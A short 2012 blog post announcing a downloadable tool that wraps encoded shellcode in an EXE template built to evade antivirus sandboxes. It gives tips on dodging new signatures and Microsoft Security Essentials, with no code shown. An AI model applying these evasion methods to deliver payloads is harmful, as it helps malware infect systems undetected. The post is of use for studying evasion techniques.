Antivirus Sandbox Evasion (part3) – The Tool
Ok, here we are..
Thank you for your patience. It is time to release the version 0.1 of the “tool“..
The archive is composed of:
- An EXE template (ultimate-payload-template1.exe) which manage the sandbox evasion.
- A Perl script (ultimate-payload.pl) which read a shellcode in binary format from STDIN, encode it, and build a new EXE file based on the template.
- The source code of the encoder (in assembly) and the template (Visual Studio 2008).
I do not expect it to bypass all AVs forever. I guess new signatures of the template will appear shortly. But don’t worry, all you have to do is to modify the source code of the template, and recompile it. In case of new sandbox problems, just use your imagination
Note: this technique doesn’t work anymore against MS Essential Security. For this reason, I wrote a new version (0.2) with a new technique, but this one will not be published.. (yet). However, a little bird told me that using a stupid junk loop in v0.1 would do the trick against Essential Security
Download the tool: ultimate-payload-v0.1.tar.gz and read the HOWTO.txt file.
As usual, be nice. Ask the permission of the owner before infecting a computer…
Foip(4 votes, average: 4.00 out of 5)
© 2012, foip. All rights reserved.